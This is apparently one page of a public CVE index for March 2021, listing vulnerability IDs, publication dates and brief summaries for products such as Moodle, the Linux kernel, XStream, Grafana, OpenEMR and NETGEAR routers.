CVE List - 2021 / March
Showing 901 - 1000 of 1447 CVEs for March 2021 (Page 10 of 15)
| CVE ID | Date | Title |
|---|---|---|
| CVE-2019-10225 | 2021-03-19 | A flaw was found in atomic-openshift of openshift-4.2 where the basic-user RABC role in OpenShift Container Platform doesn't sufficiently protect the GlusterFS StorageClass against leaking of the restuserkey. An attacker... |
| CVE-2019-14828 | 2021-03-19 | A vulnerability was found in Moodle affecting 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where users with the capability to create courses were assigned... |
| CVE-2019-14829 | 2021-03-19 | A vulnerability was found in Moodle affection 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions where activity creation capabilities were not correctly respected when selecting... |
| CVE-2019-14830 | 2021-03-19 | A vulnerability was found in Moodle 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where the mobile launch endpoint contained an open redirect in some... |
| CVE-2019-14831 | 2021-03-19 | A vulnerability was found in Moodle 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where forum subscribe link contained an open redirect if forced subscription... |
| CVE-2021-21267 | 2021-03-19 | Regular Expression Denial-of-Service in npm schema-inspector |
| CVE-2019-10200 | 2021-03-19 | A flaw was discovered in OpenShift Container Platform 4 where, by default, users with access to create pods also have the ability to schedule workloads on master nodes. Pods with... |
| CVE-2021-28117 | 2021-03-20 | libdiscover/backends/KNSBackend/KNSResource.cpp in KDE Discover before 5.21.3 automatically creates links to potentially dangerous URLs (that are neither https:// nor http://) based on the content of the store.kde.org web site. (5.18.7 is... |
| CVE-2021-28951 | 2021-03-20 | An issue was discovered in fs/io_uring.c in the Linux kernel through 5.11.8. It allows attackers to cause a denial of service (deadlock) because exit may be waiting to park a... |
| CVE-2021-28950 | 2021-03-20 | An issue was discovered in fs/fuse/fuse_i.h in the Linux kernel before 5.11.8. A "stall on CPU" can occur because a retry loop continually finds the same bad inode, aka CID-775c5033a0d1. |
| CVE-2021-28952 | 2021-03-20 | An issue was discovered in the Linux kernel through 5.11.8. The sound/soc/qcom/sdm845.c soundwire device driver has a buffer overflow when an unexpected port ID number is encountered, aka CID-1c668e1c0a0f. (This... |
| CVE-2020-27170 | 2021-03-20 | An issue was discovered in the Linux kernel before 5.11.8. kernel/bpf/verifier.c performs undesirable out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks that defeat Spectre mitigations and obtain sensitive information... |
| CVE-2020-27171 | 2021-03-20 | An issue was discovered in the Linux kernel before 5.11.8. kernel/bpf/verifier.c has an off-by-one error (with a resultant integer underflow) affecting out-of-bounds speculation on pointer arithmetic, leading to side-channel attacks... |
| CVE-2021-28954 | 2021-03-21 | In Chris Walz bit before 1.0.5 on Windows, attackers can run arbitrary code via a .exe file in a crafted repository. |
| CVE-2021-28953 | 2021-03-21 | The unofficial C/C++ Advanced Lint extension before 1.9.0 for Visual Studio Code allows attackers to execute arbitrary binaries if the user opens a crafted repository. |
| CVE-2021-28957 | 2021-03-21 | An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments, the Cleaner class does not remove the formaction attribute allowing for... |
| CVE-2021-28961 | 2021-03-21 | applications/luci-app-ddns/luasrc/model/cbi/ddns/detail.lua in the DDNS package for OpenWrt 19.07 allows remote authenticated users to inject arbitrary commands via POST requests. |
| CVE-2021-23360 | 2021-03-21 | Arbitrary Command Injection |
| CVE-2020-13963 | 2021-03-21 | SOPlanning before 1.47 has Incorrect Access Control because certain secret key information, and the related authentication algorithm, is public. The key for admin is hardcoded in the installation code, and... |
| CVE-2021-26070 | 2021-03-22 | Affected versions of Atlassian Jira Server and Data Center allow remote attackers to evade behind-the-firewall protection of app-linked resources via a Broken Authentication vulnerability in the `makeRequest` gadget resource. The... |
| CVE-2021-26069 | 2021-03-22 | Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to download temporary files and enumerate project keys via an Information Disclosure vulnerability in the /rest/api/1.0/issues/{id}/ActionsAndOperations API... |
| CVE-2021-28956 | 2021-03-22 | The unofficial vscode-sass-lint (aka Sass Lint) extension through 1.0.7 for Visual Studio Code allows attackers to execute arbitrary binaries if the user opens a crafted workspace. NOTE: This vulnerability only... |
| CVE-2021-28955 | 2021-03-22 | git-bug before 0.7.2 has an Uncontrolled Search Path Element. It will execute git.bat from the current directory in certain PATH situations (most often seen on Windows). |
| CVE-2021-28963 | 2021-03-22 | Shibboleth Service Provider before 3.2.1 allows content injection because template generation uses attacker-controlled parameters. |
| CVE-2021-28964 | 2021-03-22 | A race condition was discovered in get_old_root in fs/btrfs/ctree.c in the Linux kernel through 5.11.8. It allows attackers to cause a denial of service (BUG) because of a lack of... |
| CVE-2021-21437 | 2021-03-22 | Config Items are shown to users without permission |
| CVE-2021-21438 | 2021-03-22 | FAQ articles are shown to users without permission |
| CVE-2021-26295 | 2021-03-22 | RCE vulnerability in latest Apache OFBiz due to Java serialisation using RMI |
| CVE-2020-28501 | 2021-03-22 | Regular Expression Denial of Service (ReDoS) |
| CVE-2021-27962 | 2021-03-22 | Grafana Enterprise 7.2.x and 7.3.x before 7.3.10 and 7.4.x before 7.4.5 allows a dashboard editor to bypass a permission check concerning a data source they should not be able to... |
| CVE-2021-28146 | 2021-03-22 | The team sync HTTP API in Grafana Enterprise 7.4.x before 7.4.5 has an Incorrect Access Control issue. On Grafana instances using an external authentication service, this vulnerability allows any authenticated... |
| CVE-2021-28147 | 2021-03-22 | The team sync HTTP API in Grafana Enterprise 6.x before 6.7.6, 7.x before 7.3.10, and 7.4.x before 7.4.5 has an Incorrect Access Control issue. On Grafana instances using an external... |
| CVE-2021-28148 | 2021-03-22 | One of the usage insights HTTP API endpoints in Grafana Enterprise 6.x before 6.7.6, 7.x before 7.3.10, and 7.4.x before 7.4.5 is accessible without any authentication. This allows any unauthenticated... |
| CVE-2021-27308 | 2021-03-22 | A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. |
| CVE-2021-28968 | 2021-03-22 | An issue was discovered in PunBB before 1.4.6. An XSS vulnerability in the [email] BBcode tag allows (with authentication) injecting arbitrary JavaScript into any forum message. |
| CVE-2021-28972 | 2021-03-22 | In drivers/pci/hotplug/rpadlpar_sysfs.c in the Linux kernel through 5.11.8, the RPA PCI Hotplug driver has a user-tolerable buffer overflow when writing a new device name to the driver from userspace, allowing... |
| CVE-2021-28971 | 2021-03-22 | In intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c in the Linux kernel through 5.11.8 on some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a... |
| CVE-2021-27593 | 2021-03-22 | When a user opens manipulated Graphics Interchange Format (.GIF) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to the user... |
| CVE-2021-27595 | 2021-03-22 | When a user opens manipulated Portable Document Format (.PDF) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to the user... |
| CVE-2021-27596 | 2021-03-22 | When a user opens manipulated Autodesk 3D Studio for MS-DOS (.3DS) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to... |
| CVE-2021-27594 | 2021-03-22 | When a user opens manipulated Windows Bitmap (.BMP) files received from untrusted sources in SAP 3D Visual Enterprise Viewer, the application crashes and becomes temporarily unavailable to the user until... |
| CVE-2020-4882 | 2021-03-22 | IBM Planning Analytics 2.0 could be vulnerable to a Server-Side Request Forgery (SSRF) attack by constucting URLs from user-controlled data . This could enable attackers to make arbitrary requests to... |
| CVE-2021-26578 | 2021-03-22 | A potential security vulnerability has been identified in HPE Network Orchestrator (NetO) version(s): Prior to 2.5. The vulnerability could be remotely exploited with SQL injection. |
| CVE-2021-25265 | 2021-03-22 | A malicious website could execute code remotely in Sophos Connect Client before version 2.1. |
| CVE-2020-9212 | 2021-03-22 | There is a vulnerability in some version of USG9500 that the device improperly handles the information when a user logs in to device. The attacker can exploit the vulnerability to... |
| CVE-2020-9206 | 2021-03-22 | The eUDC660 product has a resource management vulnerability. An attacker with high privilege needs to perform specific operations to exploit the vulnerability on the affected device. Due to improper resource... |
| CVE-2020-9213 | 2021-03-22 | There is a denial of service vulnerability in some huawei products. In specific scenarios, due to the improper handling of the packets, an attacker may craft many specific packets. Successful... |
| CVE-2021-22309 | 2021-03-22 | There is insecure algorithm vulnerability in Huawei products. A module uses less random input in a secure mechanism. Attackers can exploit this vulnerability by brute forcing to obtain sensitive message.... |
| CVE-2021-22310 | 2021-03-22 | There is an information leakage vulnerability in some huawei products. Due to the properly storage of specific information in the log file, the attacker can obtain the information when a... |
| CVE-2021-22320 | 2021-03-22 | There is a denial of service vulnerability in Huawei products. A module cannot deal with specific messages correctly. Attackers can exploit this vulnerability by sending malicious messages to an affected... |
| CVE-2021-22311 | 2021-03-22 | There is an improper permission assignment vulnerability in Huawei ManageOne product. Due to improper security hardening, the process can run with a higher privilege. Successful exploit could allow certain users... |
| CVE-2021-22321 | 2021-03-22 | There is a use-after-free vulnerability in a Huawei product. A module cannot deal with specific operations in special scenarios. Attackers can exploit this vulnerability by performing malicious operations. This can... |
| CVE-2021-22314 | 2021-03-22 | There is a local privilege escalation vulnerability in some versions of ManageOne. A local authenticated attacker could perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker... |
| CVE-2021-25919 | 2021-03-22 | In OpenEMR, versions 5.0.2 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly. A highly privileged attacker could inject arbitrary code into input... |
| CVE-2021-25921 | 2021-03-22 | In OpenEMR, versions 2.7.3-rc1 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly in the `Allergies` section. An attacker could lure an admin... |
| CVE-2021-25920 | 2021-03-22 | In OpenEMR, versions v2.7.2-rc1 to 6.0.0 are vulnerable to Improper Access Control when creating a new user, which leads to a malicious user able to read and send sensitive messages... |
| CVE-2021-25918 | 2021-03-22 | In OpenEMR, versions 5.0.2 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly and rendered in the TOTP Authentication method page. A highly... |
| CVE-2021-25917 | 2021-03-22 | In OpenEMR, versions 5.0.2 to 6.0.0 are vulnerable to Stored Cross-Site-Scripting (XSS) due to user input not being validated properly and rendered in the U2F USB Device authentication method page.... |
| CVE-2021-25922 | 2021-03-22 | In OpenEMR, versions 4.2.0 to 6.0.0 are vulnerable to Reflected Cross-Site-Scripting (XSS) due to user input not being validated properly. An attacker could trick a user to click on a... |
| CVE-2021-21347 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21346 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21345 | 2021-03-22 | XStream is vulnerable to a Remote Command Execution attack |
| CVE-2021-21344 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21343 | 2021-03-22 | XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights |
| CVE-2021-21342 | 2021-03-22 | A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host |
| CVE-2021-21341 | 2021-03-22 | XStream can cause a Denial of Service |
| CVE-2021-21351 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21350 | 2021-03-22 | XStream is vulnerable to an Arbitrary Code Execution attack |
| CVE-2021-21349 | 2021-03-22 | A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an arbitrary URL referencing a resource in an intranet or the local host |
| CVE-2021-21348 | 2021-03-22 | XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos) |
| CVE-2021-20227 | 2021-03-23 | A flaw was found in SQLite's SELECT query functionality (src/select.c). This flaw allows an attacker who is capable of running SQL queries locally on the SQLite database to cause a... |
| CVE-2021-21338 | 2021-03-23 | Open Redirection in Login Handling |
| CVE-2021-21358 | 2021-03-23 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in typo3/cms-form |
| CVE-2021-21357 | 2021-03-23 | Broken Access Control in Form Framework |
| CVE-2021-21355 | 2021-03-23 | Unrestricted File Upload in Form Framework |
| CVE-2021-21340 | 2021-03-23 | Cross-Site Scripting in Content Preview |
| CVE-2021-21339 | 2021-03-23 | Cleartext storage of session identifier |
| CVE-2021-21370 | 2021-03-23 | Cross-Site Scripting in Content Preview (CType menu) |
| CVE-2021-21359 | 2021-03-23 | Denial of Service in Page Error Handling |
| CVE-2021-29068 | 2021-03-23 | Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects R6700v3 before 1.0.4.98, R6400v2 before 1.0.4.98, R7000 before 1.0.11.106, R6900P before 1.3.2.124, R7000P before 1.3.2.124,... |
| CVE-2021-29082 | 2021-03-23 | Certain NETGEAR devices are affected by disclosure of sensitive information. This affects RBW30 before 2.6.1.4, RBS40V before 2.6.1.4, RBK752 before 3.2.15.25, RBK753 before 3.2.15.25, RBK753S before 3.2.15.25, RBK754 before 3.2.15.25,... |
| CVE-2021-29081 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects RBW30 before 2.6.2.2, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before... |
| CVE-2021-29080 | 2021-03-23 | Certain NETGEAR devices are affected by password reset by an unauthenticated attacker. This affects RBK852 before 3.2.10.11, RBK853 before 3.2.10.11, RBR854 before 3.2.10.11, RBR850 before 3.2.10.11, RBS850 before 3.2.10.11, CBR40... |
| CVE-2021-29079 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29078 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, RBS850 before 3.2.17.12, RBK752... |
| CVE-2021-29077 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBW30 before 2.6.2.2, RBS40V before 2.6.2.4, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850... |
| CVE-2021-29076 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29075 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects RBW30 before 2.6.2.2, RBK852 before 3.2.17.12, RBK852 before 3.2.17.12, RBK852 before 3.2.17.12, RBR850 before... |
| CVE-2021-29074 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects RBW30 before 2.6.2.2, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before... |
| CVE-2021-29073 | 2021-03-23 | Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects R8000P before 1.4.1.66, MK62 before 1.0.6.110, MR60 before 1.0.6.110, MS60 before 1.0.6.110, R7960P before... |
| CVE-2021-29072 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29071 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, RBS850 before 3.2.17.12, RBR752... |
| CVE-2021-29070 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29069 | 2021-03-23 | Certain NETGEAR devices are affected by command injection by an authenticated user. This affects XR450 before 2.3.2.114, XR500 before 2.3.2.114, and WNR2000v5 before 1.0.0.76. |
| CVE-2021-29067 | 2021-03-23 | Certain NETGEAR devices are affected by authentication bypass. This affects RBW30 before 2.6.2.2, RBS40V before 2.6.2.4, RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, RBS850 before... |
| CVE-2021-29066 | 2021-03-23 | Certain NETGEAR devices are affected by authentication bypass. This affects RBK852 before 3.2.17.12, RBK853 before 3.2.17.12, RBK854 before 3.2.17.12, RBR850 before 3.2.17.12, and RBS850 before 3.2.17.12. |
| CVE-2021-29065 | 2021-03-23 | NETGEAR RBR850 devices before 3.2.10.11 are affected by authentication bypass. |
| CVE-2020-28503 | 2021-03-23 | Prototype Pollution |
| CVE-2021-27529 | 2021-03-23 | A cross-site scripting (XSS) vulnerability in DynPG version 4.9.2 allows remote attackers to inject JavaScript via the "limit" parameter. |
| CVE-2021-27531 | 2021-03-23 | A cross-site scripting (XSS) vulnerability in DynPG version 4.9.2 allows remote attackers to inject JavaScript via the "query" parameter. |